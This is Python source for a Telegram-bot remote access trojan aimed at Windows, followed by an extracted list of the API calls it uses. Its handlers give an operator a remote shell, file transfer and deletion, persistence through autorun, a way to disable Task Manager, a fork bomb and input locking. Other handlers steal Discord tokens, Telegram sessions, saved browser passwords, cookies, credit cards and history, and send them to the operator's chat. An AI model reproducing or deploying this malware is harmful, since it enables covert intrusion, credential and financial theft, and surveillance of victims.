if not os.path.exists(InstallPath + '\\' + ProcessName):
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
SendMessage(command, '*' + ProcessName + '* _copied to startup!_')
except FileNotFoundError:
SendMessage(command, '_No such file or directory_')
except:
pass
# Button processing that confirms the removal of a trojan
if command.data == 'confirm':
bot.edit_message_text(chat_id=command.message.chat.id,
message_id=command.message.message_id, text='_Are you sure?_', reply_markup=main4, parse_mode='Markdown')
# Handling the <<Uninstall>> Button
if command.data == 'uninstall':
SendMessage(command, '*' + CurrentName + '* _is was uninstalled!_')
Uninstall(AutorunName, InstallPath, ProcessName, CurrentName, CurrentPath, Directory)
# Handling the <<Kill All Processes>> Button
if command.data == 'taskkill all':
try:
TaskkillAll(CurrentName)
SendMessage(command, '_All processes is was stopped!_')
except:
pass
# Handling the <<Disable Task Manager>> Button
if command.data == 'disabletaskmgr':
try:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
SendMessage(command, '*Task Manager* _is already disabled!_')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights!_')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
SendMessage(command, '*Task Manager* _is was disabled!_')
except:
pass
# Handling the <<Back>> Button
if command.data == 'cancel':
SendMessage(command, '`...`')
# Browse and switch directories
@bot.message_handler(regexp='/CD')
def CD(command):
try:
Path = re.split('/CD ', command.text, flags=re.I)[1]
os.chdir(Path)
bot.send_message(command.chat.id, '_Directory Changed!_\n\n`' + os.getcwd() + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_Directory not found!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Current Directory_\n\n`' + os.getcwd() + '`\n\n_Username_\n\n`' + os.getlogin() + '`', parse_mode='Markdown')
# List of files from a directory
@bot.message_handler(regexp='/ls')
def ls(command):
try:
Dirs = '\n``'.join(os.listdir())
bot.send_message(command.chat.id, '`' + os.getcwd() + '`\n\n' + '`' + Dirs + '`', parse_mode='Markdown')
except:
try:
Dirse = '\n'.join(os.listdir())
SplittedText = util.split_string(Dirse, 4096)
for Dirse in SplittedText:
bot.send_message(command.chat.id, '`' + Dirse + '`', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
pass
# Deletes a user selected file
@bot.message_handler(commands=['Remove', 'remove'])
def Remove(command):
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
def ConvertBytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return '%3.1f %s' % (num, x)
num /= 1024.0
def FileSize(FilePath):
if os.path.isfile(FilePath):
FileInfo = os.stat(FilePath)
return ConvertBytes(FileInfo.st_size)
bot.send_message(command.chat.id,
'_File_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'_Folder_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.send_message(command.chat.id,
'_Removed_ *' + str(c) + '* _files out of_ *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
r = requests.get(URL, allow_redirects=True)
File = os.getcwd() + '\\' + os.path.basename(r.URL)
open(File, 'wb').write(r.content)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + File + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory_', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB_', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, '_File_ *' + File + '* _is running!_', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_The file is isolated by the system and cannot be running_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* is running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
try:
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Failed to get process list!_', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, '_Process_ *' + Process + '* _is was stopped!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + str(WindowTitle()) + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message is was sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL is was opened!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
try:
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
file_info = bot.get_file(command.photo[len(command.photo)-1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = Directory + file_info.file_path;
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_The photo is set on the wallpapers!_', parse_mode='Markdown')
except:
pass
# Infinite start CMD.exe
@bot.message_handler(regexp='/Forkbomb')
def Forkbomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
ForkBomb()
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed!_', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramGrab(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found!_', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found!_', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found!_', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_Display is was rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_Monitor is was Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_Monitor is was On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights!_', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the duration of the lock_\n\n*› /Freeze*', parse_mode='Markdown')
# Remote command execution (CMD)
@bot.message_handler(regexp='/CMD')
def CMD(command):
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
CMD = Popen(Command, shell=True, stdout=PIPE, stderr=STDOUT, stdin=PIPE)
Lines = []
for Line in CMD.stdout.readlines():
Line = Line.strip()
if Line:
Lines.append(Line.decode('cp866'))
Output = '\n'.join(Lines)
bot.send_message(command.chat.id, Output)
except:
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
SplittedText = util.split_string(Output, 4096)
for Output in SplittedText:
bot.send_message(command.chat.id, Output)
except UnboundLocalError:
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /CMD*', parse_mode='Markdown')
# Getting location by BSSID
@bot.message_handler(regexp='/Location')
def Location(command):
try:
bot.send_chat_action(command.chat.id, 'find_location')
Coordinates = GetLocationByBSSID(GetMacByIP())
Latitude = Coordinates['lat']
Longitude = Coordinates['lon']
bot.send_location(command.chat.id, Latitude, Longitude)
bot.send_message(command.chat.id,
'_Location_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*Latitude* » `' + str(Coordinates['lat']) + '`' +
'\n*Longitude* » `' + str(Coordinates['lon']) + '`' +
'\n*Range* » `' + str(Coordinates['range']) + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`' +
'\n',
parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Failed locate target by BSSID_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`' +
'\n',
parse_mode='Markdown')
# System Information
@bot.message_handler(regexp='/Info')
def Info(command):
try:
bot.send_message(command.chat.id,
'\n_Computer Info_'
'\n'
'\n*System* » `' + SystemVersion + '`' +
'\n*Computer Name* » `' + ComputerName + '`' +
'\n*Computer Model* » `' + Manufacturer + '`' +
'\n*Manufacturer* » `' + Model + '`' +
'\n*System Time* » `' + SystemTime() + '`' +
'\n*Username* » `' + os.getlogin() + '`' +
'\n'
'\n'
'\n_Hardware_'
'\n'
'\n*CPU* » `' + str(CPU) +'`' +
'\n*GPU* » `' + str(GPU) +'`' +
'\n*RAM* » `' + str(RAM) +'`' +
'\n*ARM* » `' + str(ARM) +'`' +
'\n'
'\n'
'\n_Protection_'
'\n'
'\n*Started as Admin* » `' + str(Admin())+'`'+
'\n*Process Protected* » `' + str(ProcessBSODProtectionEnabled) + '`' +
'\n*Installed Antivirus* » `' + Antivirus[0] + '`',
parse_mode='Markdown')
except:
pass
# Command handler / help
@bot.message_handler(commands=['Help', 'help'])
def Help(command):
bot.send_message(command.chat.id,
'ᅠᅠᅠᅠ ⚙️ *Commands* ⚙️'
'\n'
'\n'
'\n*/Info* - _System Information_'
'\n*/Location* - _Location by BSSID_'
'\n'
'\n*/Screen* - _Desktop Capture_'
'\n*/Webcam* - _Webcam Capture_'
'\n*/Audio* - _Sound Capture_'
'\n*/Power* - _Computer Power_'
'\n*/Autorun* - _Startup Management_'
'\n'
'\n*/Files* - _Files Manager_'
'\n› */CD* - _Change Directory_'
'\n› */ls* - _List of Files_'
'\n› */Remove* - _Remove a File_'
'\n› */Upload* - _Upload File_'
'\n› */Download* - _Download File_'
'\n› */Run* - _Run File_'
'\n*/Tasklist* - _Process list_'
'\n*/Taskkill* - _Process Kill_'
'\n'
'\n*/Message* - _Send Message_'
'\n*/Speak* - _Speak Message_'
'\n*/OpenURL* - _Open URL_'
'\n*/Wallpapers* - _Set Wallpapers_'
'\n*/ForkBomb* - _Launch Programs_'
'\n'
'\n*/Discord* - _Discord Token_'
'\n*/Telegram* - _Telegram Session_'
'\n*/CreditCards* - _Get CreditCards_'
'\n*/Bookmarks* - _Get Bookmarks_'
'\n*/Passwords* - _Get Passwords_'
'\n*/Cookies* - _Get Cookies_'
'\n*/History* - _Get History_'
'\n'
'\n*/Clipboard* - _Clipboard Editing_'
'\n*/Monitor* - _Monitor Control_'
'\n*/Rotate* - _Display Rotate_'
'\n*/Freeze* - _Block Input_'
'\n*/CMD* - _Remote Shell_'
'\n'
'\n'
'\n*Coded by Bainky | @bainki 👾*',
reply_markup=menu, parse_mode='Markdown')
# Navigation buttons
@bot.message_handler(commands=['3', '6'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=menu, parse_mode='Markdown')
@bot.message_handler(commands=['2', '5'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['4', '1'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main8, parse_mode='Markdown')
@bot.message_handler(commands=['Power', 'power'])
def Power(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main2, parse_mode='Markdown')
@bot.message_handler(commands=['Autorun', 'autorun'])
def Autorun(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main3, parse_mode='Markdown')
@bot.message_handler(commands=['Files', 'files'])
def Files(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main7, parse_mode='Markdown')
@bot.message_handler(commands=['Cancel'])
def CancelFiles(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['Wallpapers', 'wallpapers'])
def Wallpapers(command):
bot.send_message(command.chat.id, '_Send the photo you would like to set on the wallpapers_', parse_mode='Markdown')
try:
#bot.polling(Argument)
bot.polling(none_stop=False, interval=0, timeout=20)
except:
os.startfile(CurrentPath)
sys.exit()
| [
"telebot.types.KeyboardButton",
"requests.get",
"telebot.types.InlineKeyboardButton",
"telebot.types.ReplyKeyboardMarkup",
"telebot.types.InlineKeyboardMarkup",
"sys.exit",
"telebot.util.split_string",
"telebot.util.ThreadPool",
"getmac.get_mac_address",
"telebot.TeleBot"
] | [((1321, 1366), 'telebot.TeleBot', 'telebot.TeleBot', (['TelegramToken'], {'threaded': '(True)'}), '(TelegramToken, threaded=True)\n', (1336, 1366), False, 'import telebot\n'), ((1385, 1416), 'telebot.util.ThreadPool', 'util.ThreadPool', ([], {'num_threads': '(50)'}), '(num_threads=50)\n', (1400, 1416), False, 'from telebot import util\n'), ((1425, 1452), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (1450, 1452), False, 'from telebot import types\n'), ((1463, 1493), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/1\n<<"""'], {}), "('/1\\n<<')\n", (1483, 1493), False, 'from telebot import types\n'), ((1504, 1534), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/2\n>>"""'], {}), "('/2\\n>>')\n", (1524, 1534), False, 'from telebot import types\n'), ((1545, 1579), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (1565, 1579), False, 'from telebot import types\n'), ((1590, 1624), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Webcam\n📸"""'], {}), "('/Webcam\\n📸')\n", (1610, 1624), False, 'from telebot import types\n'), ((1635, 1668), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Audio\n🎙"""'], {}), "('/Audio\\n🎙')\n", (1655, 1668), False, 'from telebot import types\n'), ((1679, 1712), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Power\n🔴"""'], {}), "('/Power\\n🔴')\n", (1699, 1712), False, 'from telebot import types\n'), ((1723, 1758), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Autorun\n🔵"""'], {}), "('/Autorun\\n🔵')\n", (1743, 1758), False, 'from telebot import types\n'), ((1858, 1886), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (1884, 1886), False, 'from telebot import types\n'), ((1897, 1967), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Hibernate - 🛑"""'], {'callback_data': '"""hibernate"""'}), "('Hibernate - 🛑', callback_data='hibernate')\n", (1923, 1967), False, 'from telebot import types\n'), ((1978, 2047), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Shutdown - ⛔️"""'], {'callback_data': '"""shutdown"""'}), "('Shutdown - ⛔️', callback_data='shutdown')\n", (2004, 2047), False, 'from telebot import types\n'), ((2058, 2125), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Restart - ⭕️"""'], {'callback_data': '"""restart"""'}), "('Restart - ⭕️', callback_data='restart')\n", (2084, 2125), False, 'from telebot import types\n'), ((2136, 2200), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Logoff - 💢"""'], {'callback_data': '"""logoff"""'}), "('Logoff - 💢', callback_data='logoff')\n", (2162, 2200), False, 'from telebot import types\n'), ((2211, 2271), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""BSoD - 🌀"""'], {'callback_data': '"""bsod"""'}), "('BSoD - 🌀', callback_data='bsod')\n", (2237, 2271), False, 'from telebot import types\n'), ((2282, 2342), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (2308, 2342), False, 'from telebot import types\n'), ((2466, 2494), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (2492, 2494), False, 'from telebot import types\n'), ((2505, 2578), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Add to Startup - 📥"""'], {'callback_data': '"""startup"""'}), "('Add to Startup - 📥', callback_data='startup')\n", (2531, 2578), False, 'from telebot import types\n'), ((2589, 2658), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Uninstall - ♻️"""'], {'callback_data': '"""confirm"""'}), "('Uninstall - ♻️', callback_data='confirm')\n", (2615, 2658), False, 'from telebot import types\n'), ((2669, 2729), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (2695, 2729), False, 'from telebot import types\n'), ((2796, 2824), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (2822, 2824), False, 'from telebot import types\n'), ((2835, 2905), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Yes, im sure!"""'], {'callback_data': '"""uninstall"""'}), "('Yes, im sure!', callback_data='uninstall')\n", (2861, 2905), False, 'from telebot import types\n'), ((2916, 2978), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Hell no!"""'], {'callback_data': '"""cancel"""'}), "('Hell no!', callback_data='cancel')\n", (2942, 2978), False, 'from telebot import types\n'), ((2989, 3049), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (3015, 3049), False, 'from telebot import types\n'), ((3116, 3143), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (3141, 3143), False, 'from telebot import types\n'), ((3154, 3184), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/3\n<<"""'], {}), "('/3\\n<<')\n", (3174, 3184), False, 'from telebot import types\n'), ((3195, 3225), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/4\n>>"""'], {}), "('/4\\n>>')\n", (3215, 3225), False, 'from telebot import types\n'), ((3236, 3270), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (3256, 3270), False, 'from telebot import types\n'), ((3281, 3314), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Files\n💾"""'], {}), "('/Files\\n💾')\n", (3301, 3314), False, 'from telebot import types\n'), ((3325, 3361), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Tasklist\n📋"""'], {}), "('/Tasklist\\n📋')\n", (3345, 3361), False, 'from telebot import types\n'), ((3372, 3408), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Taskkill\n📝"""'], {}), "('/Taskkill\\n📝')\n", (3392, 3408), False, 'from telebot import types\n'), ((3502, 3530), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (3528, 3530), False, 'from telebot import types\n'), ((3541, 3619), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Kill all Processes"""'], {'callback_data': '"""taskkill all"""'}), "('Kill all Processes', callback_data='taskkill all')\n", (3567, 3619), False, 'from telebot import types\n'), ((3630, 3717), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Disable Task Manager"""'], {'callback_data': '"""disabletaskmgr"""'}), "('Disable Task Manager', callback_data=\n 'disabletaskmgr')\n", (3656, 3717), False, 'from telebot import types\n'), ((3760, 3787), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (3785, 3787), False, 'from telebot import types\n'), 